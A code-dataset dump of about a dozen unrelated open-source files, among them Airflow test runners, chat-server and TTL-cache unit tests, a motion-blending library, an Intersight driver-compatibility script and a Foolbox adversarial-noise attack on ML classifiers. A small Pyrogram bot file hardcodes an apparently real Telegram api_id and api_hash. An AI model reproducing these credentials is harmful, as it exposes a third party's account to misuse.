max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
dev/breeze/src/airflow_breeze/utils/run_tests.py | npodewitz/airflow | 0 | 12759551 | <gh_stars>0
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import sys
from subprocess import DEVNULL
from typing import Tuple
from airflow_breeze.utils.console import console
from airflow_breeze.utils.path_utils import AIRFLOW_SOURCES_ROOT
from airflow_breeze.utils.run_utils import run_command
def verify_an_image(
image_name: str, image_type: str, dry_run: bool, verbose: bool, extra_pytest_args: Tuple
) -> Tuple[int, str]:
command_result = run_command(
["docker", "inspect", image_name], dry_run=dry_run, verbose=verbose, check=False, stdout=DEVNULL
)
if command_result.returncode != 0:
console.print(f"[red]Error when inspecting {image_type} image: {command_result.returncode}[/]")
return command_result.returncode, f"Testing {image_type} python {image_name}"
pytest_args = ("-n", "auto", "--color=yes")
if image_type == 'PROD':
test_path = AIRFLOW_SOURCES_ROOT / "docker_tests" / "test_prod_image.py"
else:
test_path = AIRFLOW_SOURCES_ROOT / "docker_tests" / "test_ci_image.py"
env = os.environ.copy()
env['DOCKER_IMAGE'] = image_name
command_result = run_command(
[sys.executable, "-m", "pytest", str(test_path), *pytest_args, *extra_pytest_args],
dry_run=dry_run,
verbose=verbose,
env=env,
check=False,
)
return command_result.returncode, f"Testing {image_type} python {image_name}"
def run_docker_compose_tests(
image_name: str, dry_run: bool, verbose: bool, extra_pytest_args: Tuple
) -> Tuple[int, str]:
command_result = run_command(
["docker", "inspect", image_name], dry_run=dry_run, verbose=verbose, check=False, stdout=DEVNULL
)
if command_result.returncode != 0:
console.print(f"[red]Error when inspecting PROD image: {command_result.returncode}[/]")
return command_result.returncode, f"Testing docker-compose python with {image_name}"
pytest_args = ("-n", "auto", "--color=yes")
test_path = AIRFLOW_SOURCES_ROOT / "docker_tests" / "test_docker_compose_quick_start.py"
env = os.environ.copy()
env['DOCKER_IMAGE'] = image_name
command_result = run_command(
[sys.executable, "-m", "pytest", str(test_path), *pytest_args, *extra_pytest_args],
dry_run=dry_run,
verbose=verbose,
env=env,
check=False,
)
return command_result.returncode, f"Testing docker-compose python with {image_name}"
| 2.140625 | 2 |
borrowingMoneyManagement/urls.py | 520MianXiangDuiXiang520/FamilyPropertyManageSystem | 7 | 12759552 | from django.urls import path
from .views import BorrowingView
from .views import PayBackView
urlpatterns = [
path('borrow/', BorrowingView.as_view()),
path('payBack/', PayBackView.as_view())
] | 1.609375 | 2 |
gators/encoders/tests/test_base_encoder.py | Aditya-Kapadiya/gators | 4 | 12759553 | <gh_stars>1-10
# License: Apache-2.0
import pytest
from gators.encoders import WOEEncoder
def test_init():
with pytest.raises(TypeError):
WOEEncoder(dtype=str)
| 1.835938 | 2 |
bin/ADFRsuite/CCSBpckgs/PmvApp/__init__.py | AngelRuizMoreno/Jupyter_Dock_devel | 0 | 12759554 | ################################################################################
##
## This library is free software; you can redistribute it and/or
## modify it under the terms of the GNU Lesser General Public
## License as published by the Free Software Foundation; either
## version 2.1 of the License, or (at your option) any later version.
##
## This library is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public
## License along with this library; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
##
## (C) Copyrights Dr. <NAME> and TSRI 2016
##
################################################################################
#############################################################################
#
# Author: <NAME>
#
# Copyright: <NAME> TSRI 2014
#
#########################################################################
#
# $Header: /mnt/raid/services/cvs/PmvApp/__init__.py,v 1.2.4.1 2017/07/13 20:55:28 annao Exp $
#
# $Id: __init__.py,v 1.2.4.1 2017/07/13 20:55:28 annao Exp $
#
def mkPmvApp(eventHandler=None):
# create PmvApp
from PmvApp.Pmv import MolApp
pmv = MolApp()
pmv.trapExceptions = False
return pmv
def loadDefaultCommands(pmv):
from PmvApp.msmsCmds import ComputeMSMS, DisplayMSMS, UndisplayMSMS
pmv.addCommand(ComputeMSMS(), 'computeMSMS')
pmv.computeMSMS.loadCommand() # load the command
#pmv.userpref.set('Compute cavities by default', 'yes')
pmv.addCommand(DisplayMSMS(), 'displayMSMS')
pmv.addCommand(UndisplayMSMS(), 'undisplayMSMS')
#pmv.lazyLoad('displayHyperBallsCmds', package='PmvApp')
pmv.lazyLoad('cartoonCmds', package='PmvApp')
pmv.lazyLoad('interactionsCmds', package='PmvApp')
#pmv.lazyLoad('coarseMolecularSurfaceCmds', package='PmvApp')
pmv.setOnAddObjectCmd('Molecule', [pmv.displayLines,
pmv.colorByAtomType,
pmv.colorByMolecules],
kwList=[{}, {}, {'carbonsOnly':True}])
## pmv.lazyLoad('bondsCmds', package='PmvApp')
## pmv.lazyLoad('fileCmds', package='PmvApp')
## pmv.lazyLoad('displayCmds', package='PmvApp')
## pmv.lazyLoad('editCmds', package='PmvApp')
## pmv.displayLines.loadCommand()
## pmv.lazyLoad("colorCmds", package="PmvApp")
## pmv.color.loadCommand()
## pmv.lazyLoad("selectionCmds", package="PmvApp")
## pmv.lazyLoad('deleteCmds', package='PmvApp')
## pmv.lazyLoad('labelCmds', package='PmvApp')
## pmv.lazyLoad('msmsCmds', package='PmvApp')
## pmv.lazyLoad('displayHyperBallsCmds', package='PmvApp')
## pmv.lazyLoad('interactionsCmds', package='PmvApp')
## pmv.lazyLoad('coarseMolecularSurfaceCmds', package='PmvApp')
## pmv.setOnAddObjectCmd('Molecule', [pmv.displayLines, pmv.colorByAtomType])
| 0.949219 | 1 |
notebooks/_solutions/11-xarray-intro25.py | jorisvandenbossche/DS-python-geospatial | 58 | 12759555 | <filename>notebooks/_solutions/11-xarray-intro25.py
# As a quick reference, plot using the `"Greens"` colormap as such:
fig, ax = plt.subplots(figsize=(14, 5))
ll = ndvi.plot.imshow(ax=ax, cmap="Greens")
ax.set_aspect("equal") | 1.960938 | 2 |
tests/test_server.py | noechavez0001/Modelado2017-1 | 12 | 12759556 | <filename>tests/test_server.py
from chat.server import ChatProtocolFactory
from twisted.test import proto_helpers
from twisted.trial import unittest
class ChatServerTest(unittest.TestCase):
"""
Tests for the Chat Server follows
"""
def setUp(self):
factory = ChatProtocolFactory()
self.proto1 = factory.buildProtocol(('127.0.0.1', 0))
self.proto2 = factory.buildProtocol(('127.0.0.1', 0))
self.proto3 = factory.buildProtocol(('127.0.0.1', 0))
self.proto1.factory = factory
self.proto2.factory = factory
self.proto3.factory = factory
self.tr1 = proto_helpers.StringTransport()
self.tr2 = proto_helpers.StringTransport()
self.tr3 = proto_helpers.StringTransport()
self.proto1.makeConnection(self.tr1)
self.proto2.makeConnection(self.tr2)
self.proto3.makeConnection(self.tr3)
def tearDown(self):
self.proto1.transport.loseConnection()
self.proto2.transport.loseConnection()
self.proto3.transport.loseConnection()
def test_register(self):
"""
Tests the REGISTER command of chat. Used to 'add' the user to the chat
command is of the format REGISTER:<NICK>:<NULL>
Reply is in the format:
1. If success then -> OK:NICK:<NICK>
2. If failed then -> ERR:NICK:<MSG>
"""
self.proto1.lineReceived('REGISTER:foo:')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), ['foo'])
self.assertEqual(self.tr1.value().strip(), 'OK:NICK:foo')
self.proto2.lineReceived('REGISTER:foo:')
self.assertEqual(self.tr2.value().strip(), 'ERR:NICK:Nick already exists. Use another nick')
self.proto3.lineReceived('REGISTER:bar:')
self.assertItemsEqual(self.proto3.factory.parser.get_clients(), ['foo', 'bar'])
self.assertEqual(self.tr3.value().strip(), 'OK:NICK:bar')
def test_valid_chat(self):
"""
Tests the CHAT command of chat. Used by users to send their data to server
Server will then send the data to all clients.
command is of the format CHAT:<DATA>
Reply for success is in the format -> OK:DATA:<NICK>:<MESSAGE>
"""
self.proto1.lineReceived('REGISTER:foo:')
self.proto1.lineReceived('CHAT:This is a test message')
self.assertEqual(self.tr1.value().strip(), 'OK:NICK:foo\r\nOK:CHAT:foo:This is a test message')
def test_invalid_chat(self):
"""
Test the CHAT command when the user has not actually registered themselves
"""
self.proto1.lineReceived('CHAT:foo:This is a test message')
self.assertEqual(self.tr1.value().strip(), 'ERR:CHAT:Unregistered user! register first.')
def test_unregister(self):
"""
Tests the UNREGISTER command of chat. Used to unregister and remove the connection
Command is of the format UNREGISTER::
No reply is there for this command
"""
self.proto1.lineReceived('REGISTER:foo:')
self.assertEqual(self.tr1.value().strip(), 'OK:NICK:foo')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), ['foo'])
self.proto1.lineReceived('UNREGISTER::')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), [])
# if someone unregistered sends unregister, ignore them
self.proto1.lineReceived('UNREGISTER::')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), [])
def test_change_nick(self):
"""
Tests whether on changing nick, proper updation is done at server side
"""
self.proto1.lineReceived('REGISTER:foo:')
self.proto1.lineReceived('CHAT:hey')
self.proto1.lineReceived('REGISTER:bar:')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), ['bar'])
self.assertEqual(self.tr1.value().strip(), 'OK:NICK:foo\r\nOK:CHAT:foo:hey\r\nOK:NICK:bar')
def test_unregistered_user(self):
"""
Tests that an unregistered user is not allowed to talk
"""
self.proto1.lineReceived('CHAT:what up buddy?')
self.assertEqual(self.tr1.value().strip(), 'ERR:CHAT:Unregistered user! register first.')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), [])
def test_user_disconnected(self):
"""
Tests that when user is disconnected, proper cleanup is performed
"""
self.proto1.lineReceived('REGISTER:foo:')
self.proto1.lineReceived('CHAT:hey')
self.proto1.lineReceived('UNREGISTER:')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), [])
def test_get_clients(self):
"""
Tests the get_clients method of parser
"""
self.proto1.lineReceived('REGISTER:foo:')
self.proto2.lineReceived('REGISTER:bar:')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), self.proto1.factory.parser.clients.keys())
def test_invalid_data(self):
"""
Tests that server ignores invalid data
"""
self.proto1.lineReceived('REGISTER:foo:')
self.proto1.lineReceived('hahahahahhahahahhahahahahhaa')
self.proto1.lineReceived('muahahahhahahahahhahahahahah')
self.assertEqual(self.tr1.value(), 'OK:NICK:foo\r\n')
self.proto2.lineReceived('REGISTER:soo:')
self.proto2.lineReceived('hahahahahhahahahhahahahahha:a')
self.proto2.lineReceived('muahahahhahahahahhahahaha:hah')
self.assertEqual(self.tr2.value(), 'OK:NICK:soo\r\nERR:a\r\nERR:hah\r\n')
def test_connection_lost(self):
"""
Tests that when connection is lost, reuse of nick is allowed
"""
self.proto1.lineReceived('REGISTER:foo:')
self.proto1.lineReceived('CHAT: ok some data')
self.proto1.loseConnection()
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), [])
self.proto2.lineReceived('REGISTER:foo:')
self.assertEqual(self.tr2.value().strip(), 'OK:NICK:foo')
| 2.78125 | 3 |
tests/test_ttl.py | Jude188/cachetools | 0 | 12759557 | <reponame>Jude188/cachetools
import unittest
from cachetools import TTLCache
from . import CacheTestMixin
class Timer:
def __init__(self, auto=False):
self.auto = auto
self.time = 0
def __call__(self):
if self.auto:
self.time += 1
return self.time
def tick(self):
self.time += 1
class TTLTestCache(TTLCache):
def __init__(self, maxsize, ttl=0, **kwargs):
TTLCache.__init__(self, maxsize, ttl=ttl, timer=Timer(), **kwargs)
class TTLCacheTest(unittest.TestCase, CacheTestMixin):
Cache = TTLTestCache
def test_ttl(self):
cache = TTLCache(maxsize=2, ttl=1, timer=Timer())
self.assertEqual(0, cache.timer())
self.assertEqual(1, cache.ttl)
cache[1] = 1
self.assertEqual({1}, set(cache))
self.assertEqual(1, len(cache))
self.assertEqual(1, cache[1])
cache.timer.tick()
self.assertEqual({1}, set(cache))
self.assertEqual(1, len(cache))
self.assertEqual(1, cache[1])
cache[2] = 2
self.assertEqual({1, 2}, set(cache))
self.assertEqual(2, len(cache))
self.assertEqual(1, cache[1])
self.assertEqual(2, cache[2])
cache.timer.tick()
self.assertEqual({2}, set(cache))
self.assertEqual(1, len(cache))
self.assertNotIn(1, cache)
self.assertEqual(2, cache[2])
cache[3] = 3
self.assertEqual({2, 3}, set(cache))
self.assertEqual(2, len(cache))
self.assertNotIn(1, cache)
self.assertEqual(2, cache[2])
self.assertEqual(3, cache[3])
cache.timer.tick()
self.assertEqual({3}, set(cache))
self.assertEqual(1, len(cache))
self.assertNotIn(1, cache)
self.assertNotIn(2, cache)
self.assertEqual(3, cache[3])
cache.timer.tick()
self.assertEqual(set(), set(cache))
self.assertEqual(0, len(cache))
self.assertNotIn(1, cache)
self.assertNotIn(2, cache)
self.assertNotIn(3, cache)
with self.assertRaises(KeyError):
del cache[1]
with self.assertRaises(KeyError):
cache.pop(2)
with self.assertRaises(KeyError):
del cache[3]
def test_custom_ttl(self):
cache = TTLCache(maxsize=3, ttl=1, timer=Timer())
cache.set(1, 1)
cache.set(2, 2, ttl=2)
cache.set(3, 3)
cache.timer.tick()
self.assertEqual(1, cache[1])
self.assertEqual(2, cache[2])
self.assertEqual(3, cache[3])
cache.timer.tick()
self.assertNotIn(1, cache)
self.assertNotIn(3, cache)
self.assertEqual(2, cache[2])
cache.timer.tick()
self.assertNotIn(2, cache)
def test_ttl_lru(self):
cache = TTLCache(maxsize=2, ttl=0, timer=Timer())
cache[1] = 1
cache[2] = 2
cache[3] = 3
self.assertEqual(len(cache), 2)
self.assertNotIn(1, cache)
self.assertEqual(cache[2], 2)
self.assertEqual(cache[3], 3)
cache[2]
cache[4] = 4
self.assertEqual(len(cache), 2)
self.assertNotIn(1, cache)
self.assertEqual(cache[2], 2)
self.assertNotIn(3, cache)
self.assertEqual(cache[4], 4)
cache[5] = 5
self.assertEqual(len(cache), 2)
self.assertNotIn(1, cache)
self.assertNotIn(2, cache)
self.assertNotIn(3, cache)
self.assertEqual(cache[4], 4)
self.assertEqual(cache[5], 5)
def test_ttl_expire(self):
cache = TTLCache(maxsize=3, ttl=2, timer=Timer())
with cache.timer as time:
self.assertEqual(time, cache.timer())
self.assertEqual(2, cache.ttl)
cache[1] = 1
cache.timer.tick()
cache[2] = 2
cache.timer.tick()
cache[3] = 3
self.assertEqual(2, cache.timer())
self.assertEqual({1, 2, 3}, set(cache))
self.assertEqual(3, len(cache))
self.assertEqual(1, cache[1])
self.assertEqual(2, cache[2])
self.assertEqual(3, cache[3])
cache.expire()
self.assertEqual({1, 2, 3}, set(cache))
self.assertEqual(3, len(cache))
self.assertEqual(1, cache[1])
self.assertEqual(2, cache[2])
self.assertEqual(3, cache[3])
cache.expire(3)
self.assertEqual({2, 3}, set(cache))
self.assertEqual(2, len(cache))
self.assertNotIn(1, cache)
self.assertEqual(2, cache[2])
self.assertEqual(3, cache[3])
cache.expire(4)
self.assertEqual({3}, set(cache))
self.assertEqual(1, len(cache))
self.assertNotIn(1, cache)
self.assertNotIn(2, cache)
self.assertEqual(3, cache[3])
cache.expire(5)
self.assertEqual(set(), set(cache))
self.assertEqual(0, len(cache))
self.assertNotIn(1, cache)
self.assertNotIn(2, cache)
self.assertNotIn(3, cache)
def test_ttl_atomic(self):
cache = TTLCache(maxsize=1, ttl=1, timer=Timer(auto=True))
cache[1] = 1
self.assertEqual(1, cache[1])
cache[1] = 1
self.assertEqual(1, cache.get(1))
cache[1] = 1
self.assertEqual(1, cache.pop(1))
cache[1] = 1
self.assertEqual(1, cache.setdefault(1))
cache[1] = 1
cache.clear()
self.assertEqual(0, len(cache))
def test_ttl_tuple_key(self):
cache = TTLCache(maxsize=1, ttl=0, timer=Timer())
self.assertEqual(0, cache.ttl)
cache[(1, 2, 3)] = 42
self.assertEqual(42, cache[(1, 2, 3)])
cache.timer.tick()
with self.assertRaises(KeyError):
cache[(1, 2, 3)]
self.assertNotIn((1, 2, 3), cache)
| 2.8125 | 3 |
src/python_op3/framework/modules/direct_control.py | culdo/python-op3 | 5 | 12759558 | <filename>src/python_op3/framework/modules/direct_control.py
# -*- coding: utf-8 -*-
import rospy
import numpy as np
from sensor_msgs.msg import JointState
import time
class DirectControl(object):
def __init__(self, ns):
self.ns = ns
self._pub_joints = rospy.Publisher(ns + "/direct_control/set_joint_states", JointState, queue_size=0)
def set_default_moving_time(self, param):
rospy.set_param(self.ns + "/direct_control/default_moving_time", param)
def set_default_moving_angle(self, param):
rospy.set_param(self.ns + "/direct_control/default_moving_angle", param)
def set_check_collision(self, param):
rospy.set_param(self.ns + "/direct_control/check_collision", param)
def set_angles(self, angles):
self.check_module("direct_control_module")
msg = JointState()
msg.name = angles.keys()
msg.position = angles.values()
self._pub_joints.publish(msg)
def wave_angle(self, test_joints, angles=None, duration=2, print_angle=False):
if angles is None:
angles = np.random.uniform(1.57, -1.57, 3)
angle_dict = dict(zip(test_joints, angles))
self.set_angles(angle_dict)
if print_angle:
rospy.loginfo(np.round(angle_dict.values(), 2))
rospy.sleep(duration=duration)
def set_angles_slow(self, stop_angles, delay=2):
start_angles = self.get_angles()
start = time.time()
stop = start + delay
r = rospy.Rate(100)
while not rospy.is_shutdown():
t = time.time()
if t > stop: break
ratio = (t - start) / delay
angles = interpolate(stop_angles, start_angles, ratio)
self.set_angles(angles)
r.sleep()
def interpolate(anglesa, anglesb, coefa):
z = {}
joints = anglesa.keys()
for j in joints:
z[j] = anglesa[j] * coefa + anglesb[j] * (1 - coefa)
return z
| 2.484375 | 2 |
zandpbcodes.py | TG-chembanreju/okbai | 0 | 12759559 | <gh_stars>0
from pyrogram import Client, filters
Pbz=Client(
"Me and pushpa",
api_id="13160306",
api_hash="5023c40ea655bc2834e48888b17ccee8",
bot_token="5<PASSWORD>:AA<PASSWORD>",
plugins=dict(root="zpb_codes")
)
Pbz.run()
| 1.78125 | 2 |
cnns/foolbox/foolbox_2_3_0/attacks/blended_noise.py | anonymous-user-commits/perturb-net | 12 | 12759560 | <gh_stars>10-100
import logging
import warnings
from collections import Iterable
import numpy as np
from .base import Attack
from .base import generator_decorator
from .. import nprng
class BlendedUniformNoiseAttack(Attack):
"""Blends the input with a uniform noise input until it is misclassified.
"""
@generator_decorator
def as_generator(self, a, epsilons=1000, max_directions=1000):
"""Blends the input with a uniform noise input until it is misclassified.
Parameters
----------
input_or_adv : `numpy.ndarray` or :class:`Adversarial`
The original, unperturbed input as a `numpy.ndarray` or
an :class:`Adversarial` instance.
label : int
The reference label of the original input. Must be passed
if `a` is a `numpy.ndarray`, must not be passed if `a` is
an :class:`Adversarial` instance.
unpack : bool
If true, returns the adversarial input, otherwise returns
the Adversarial object.
epsilons : int or Iterable[float]
Either Iterable of blending steps or number of blending steps
between 0 and 1 that should be tried.
max_directions : int
Maximum number of random inputs to try.
"""
x = a.unperturbed
min_, max_ = a.bounds()
if a.perturbed is not None: # pragma: no cover
warnings.warn(
"BlendedUniformNoiseAttack started with"
" previously found adversarial."
)
for j in range(max_directions):
# random noise inputs tend to be classified into the same class,
# so we might need to make very many draws if the original class
# is that one
random = nprng.uniform(min_, max_, size=x.shape).astype(x.dtype)
_, is_adversarial = yield from a.forward_one(random)
if is_adversarial:
logging.info(
"Found adversarial input after {} " "attempts".format(j + 1)
)
break
else:
# never breaked
warnings.warn(
"BlendedUniformNoiseAttack failed to draw a"
" random input that is adversarial."
)
if not isinstance(epsilons, Iterable):
epsilons = np.linspace(0, 1, num=epsilons + 1)[1:]
for epsilon in epsilons:
perturbed = (1 - epsilon) * x + epsilon * random
# due to limited floating point precision,
# clipping can be required
if not a.in_bounds(perturbed): # pragma: no cover
np.clip(perturbed, min_, max_, out=perturbed)
_, is_adversarial = yield from a.forward_one(perturbed)
if is_adversarial:
return
| 2.359375 | 2 |
test/test_billing_cycles_page_all_of.py | CiscoDevNet/python-msx-sdk | 0 | 12759561 | <reponame>CiscoDevNet/python-msx-sdk
"""
MSX SDK
MSX SDK client. # noqa: E501
The version of the OpenAPI document: 1.0.9
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import python_msx_sdk
from python_msx_sdk.model.billing_cycle import BillingCycle
globals()['BillingCycle'] = BillingCycle
from python_msx_sdk.model.billing_cycles_page_all_of import BillingCyclesPageAllOf
class TestBillingCyclesPageAllOf(unittest.TestCase):
"""BillingCyclesPageAllOf unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testBillingCyclesPageAllOf(self):
"""Test BillingCyclesPageAllOf"""
# FIXME: construct object with mandatory attributes with example values
# model = BillingCyclesPageAllOf() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 2.15625 | 2 |
incompatibledrivers.py | briamorr/IntersightIncompatibleDrivers | 0 | 12759562 | <gh_stars>0
import json
import requests
from intersight_auth import IntersightAuth
def getRecommendedDriver(Status,InvModel,InvOsVendor,HclOsVersion,InvFirmwareVersion,components,InvProcessor):
print("Current HCL Status: " + Status)
print("Current Operating System: " + HclOsVersion )
print("Current Firmware Version: " + InvFirmwareVersion)
print("Current Model: " + InvModel)
componentList = []
hclComponentInfo = ""
for fields in components:
componentList.append([fields[0],fields[1],fields[2],fields[3],fields[4]])
hclComponentInfo = hclComponentInfo + "{\"Firmwares\":[{\"FirmwareVersion\":\"" + fields[1] + "\"}],\"Model\":\"" + fields[0] + "\"},"
# Strip off trailing "," from the above loop to avoid breaking JSON format
hclComponentInfo = hclComponentInfo[:-1]
ProfileList = "{\"ProfileList\":[{\"OsVendor\":\"" + InvOsVendor + "\",\"OsVersion\":\"" + HclOsVersion + "\",\"ProcessorModel\":\"" + InvProcessor + "\"," \
"\"UcsVersion\":\"" + InvFirmwareVersion + "\",\"ServerModel\":\"" + InvModel + "\",\"Products\":[" + hclComponentInfo + "]}]" \
",\"RequestType\":\"GetRecommendedDrivers\"}"
resource_path = "https://intersight.com/api/v1/hcl/CompatibilityStatuses"
RESPONSE = requests.post(resource_path,ProfileList,auth=AUTH)
compatabilityStatuses = RESPONSE.json()["ProfileList"]
HCLList = []
for s in compatabilityStatuses:
for t in (s["Products"]):
for q in (t["Firmwares"]):
HCLList.append([q["DriverName"],q["DriverVersion"]])
#Remove duplicate driver names & version from HCLList
cleanup = []
[cleanup.append(x) for x in HCLList if x not in cleanup]
HCLList = cleanup
for field in componentList:
if "Incompatible-Driver" in field[4]:
print("\n")
print("Component Status: " + field[4])
print("Model: " + field[0])
print("Firmware: " + field[1])
print("Driver Name: " + field[3])
print("Current Incompatible Driver Version: " + field[2])
print("Supported Driver Versions: ")
for drivers in HCLList:
if field[3] in drivers:
print(drivers[1])
def getComponents(link):
json_body = {
"request_method": "GET",
"resource_path": link
}
RESPONSE = requests.request(
method=json_body['request_method'],
url=json_body['resource_path'],
auth=AUTH
)
affectedDevice = RESPONSE.json()
return [affectedDevice['InvModel'], affectedDevice['InvFirmwareVersion'],affectedDevice['InvDriverVersion'],affectedDevice['InvDriverName'],affectedDevice['SoftwareStatus']]
def getHCLStatus():
components = []
serverMOID = '60b663a876752d3132542179'
json_body = {
"request_method": "GET",
"resource_path": (
'https://intersight.com/api/v1/cond/HclStatuses?$filter=(ManagedObject.Moid%20eq%20%27' + serverMOID + '%27)'
)
}
RESPONSE = requests.request(
method=json_body['request_method'],
url=json_body['resource_path'],
auth=AUTH
)
hclStatuses = RESPONSE.json()["Results"]
for r in hclStatuses:
try:
Status = r['Status']
InvModel = r['InvModel']
InvOsVendor = r['InvOsVendor']
HclOsVersion = r['HclOsVersion']
InvProcessor = r['InvProcessor']
InvFirmwareVersion = r['InvFirmwareVersion']
for s in r['Details']:
components.append(getComponents(s['link']))
except:
print("")
getRecommendedDriver(Status,InvModel,InvOsVendor,HclOsVersion,InvFirmwareVersion,components,InvProcessor)
#Configure Intersight API token and start finding all devices affected by a security advisory
AUTH = IntersightAuth(
secret_key_filename='SecretKey.txt',
api_key_id='x/y/z'
)
getHCLStatus() | 2.5 | 2 |
mblend/__init__.py | cheind/motion-blend | 3 | 12759563 | from typing import Protocol, Union
import dataclasses
import numpy as np
class Motion(Protocol):
"""Protocol of a 1D motion."""
"""Shift of motion along time axis."""
offset: float
def at(self, t: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
"""Returns the position at time(s)."""
...
def d_at(self, t: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
"""Returns the velocity at time(s)."""
...
@dataclasses.dataclass
class PolynomialMotion(Motion):
"""One-dimensional motion represented by a polynomial of degree N.
Args:
offset: Global time offset of this motion
coeffs: N+1 polynomial coefficients starting with the highest term.
"""
offset: float
coeffs: np.ndarray
degree: int = dataclasses.field(init=False)
def __post_init__(self):
self.degree = len(self.coeffs) - 1
self.coeffs = np.asarray(self.coeffs).reshape(-1, 1)
def at(self, t: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
"""Returns the position at time(s)."""
scalar = np.isscalar(t)
t = np.atleast_1d(t)
v = np.vander(t - self.offset, self.degree + 1) # Nx(D+1)
x = v @ self.coeffs # Nx1
if scalar:
return x.item()
else:
return x.squeeze(-1)
def d_at(self, t: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
"""Returns the velocity at time(s)."""
scalar = np.isscalar(t)
t = np.atleast_1d(t) - self.offset
dv = np.array(
[i * t ** (i - 1) for i in reversed(range(1, self.degree + 1))]
) # NxD
dx = dv.T @ self.coeffs[:-1]
if scalar:
return dx.item()
else:
return dx.squeeze(-1)
def poly_blend_3(m1: Motion, m2: Motion, tnow: float, h: float) -> PolynomialMotion:
"""Returns a third-degree polynomial function that blends two motions.
Args:
m1: First motion
m2: Second motion
tnow: Start of blend
h: Horizon of blend
Returns:
mblend: Polynomial motion blending m1 and m2 in segment [tnow, tnow+h].
"""
if h <= 0.0:
raise ValueError("Horizon has to be > 0.0")
A = np.zeros((4, 4))
b = np.zeros(4)
# Position at start (tnow) should match m1
# Note, the offset (shift) of blended motion will be tnow
A[0, 0] = 0
A[0, 1] = 0
A[0, 2] = 0
A[0, 3] = 1
b[0] = m1.at(tnow)
# Position at end of horizon should match m2
A[1, 0] = h ** 3
A[1, 1] = h ** 2
A[1, 2] = h
A[1, 3] = 1
b[1] = m2.at(tnow + h)
# Velocity at start should match m1
A[2, 0] = 0
A[2, 1] = 0
A[2, 2] = 1
A[2, 3] = 0
b[2] = m1.d_at(tnow)
# Velocity at end should match m2
A[3, 0] = 3 * h ** 2
A[3, 1] = 2 * h
A[3, 2] = 1
A[3, 3] = 0
b[3] = m2.d_at(tnow + h)
coeffs = np.linalg.solve(A, b) # TODO: handle singularities
return PolynomialMotion(tnow, coeffs)
@dataclasses.dataclass
class PolynomialMotionBlend(Motion):
"""A piecewise blended motion with C1 smoothness.
The blended motion consists of three pieces
- m1 when t < start
- blend when start <= t <= end of blending
- m2 when end < t
At joint points the positions and first order derivatives match up.
If `flatten` is True, m1 and m2 will be simplified assuming that t is
monotonically increasing and values of `t < start` are not of interest.
Otherwise, recursive blending may lead to memory overflow.
"""
m1: Motion
m2: Motion
offset: float
horizon: float
blend: Motion = dataclasses.field(init=False)
flatten: dataclasses.InitVar[bool] = False
def __post_init__(self, flatten: bool):
if flatten:
self.m1 = _flatten(self.m1, self.offset)
self.m2 = _flatten(self.m2, self.offset)
self.blend = poly_blend_3(self.m1, self.m2, self.offset, self.horizon)
def at(self, t: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
return self._compute(t, "at")
def d_at(self, t: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
return self._compute(t, "d_at")
@property
def range(self):
return (self.offset, self.offset + self.horizon)
def _compute(
self, t: Union[float, np.ndarray], attr: str
) -> Union[float, np.ndarray]:
scalar = np.isscalar(t)
t = np.atleast_1d(t)
low, high = self.range
x = np.empty_like(t)
mask = t < low
x[mask] = getattr(self.m1, attr)(t[mask])
mask = t > high
x[mask] = getattr(self.m2, attr)(t[mask])
mask = np.logical_and(t >= low, t <= high)
x[mask] = getattr(self.blend, attr)(t[mask])
if scalar:
return x.item()
else:
return x
def _flatten(m: Motion, offset: float) -> Motion:
"""Recursively simplify older motions to avoid stacking of blends.
The resulting motion is identical fo `t>=offset`, but may change for
values less than offset.
"""
if isinstance(m, PolynomialMotionBlend):
if m.range[1] < offset:
return m.m2
elif m.range[0] < offset:
return m.blend
else:
return _flatten(m.m1, offset)
else:
return m
| 3.734375 | 4 |
wisper/encryption.py | parkerduckworth/wisper | 1 | 12759564 | <filename>wisper/encryption.py
from cryptography.fernet import Fernet, InvalidToken
class Cipher(object):
"""Message cipher for Client instances
fernet_key: (Fernet) Symmetric encryption object. Can only decrypt data
that has been encrypted with a cipher created using a matching
secret key
"""
def __init__(self, secret_key):
self.fernet_key = Fernet(secret_key)
def encrypt(self, token):
cipher_text = self.fernet_key.encrypt(token)
return cipher_text
def decrypt(self, token):
plain_text = self.fernet_key.decrypt(token)
return plain_text
def is_encrypted(self, token):
"""Check if token is encrypted
If token cannot be decrypted, it is assumed to be unencrypted
"""
try:
self.fernet_key.decrypt(token)
return True
except InvalidToken:
return False
def generate_secret_key():
"""Generate new secret key"""
secret_key = Fernet.generate_key()
return secret_key
# Reassign so cryptography.fernet module only needs to be imported here
InvalidToken = InvalidToken
| 3.609375 | 4 |
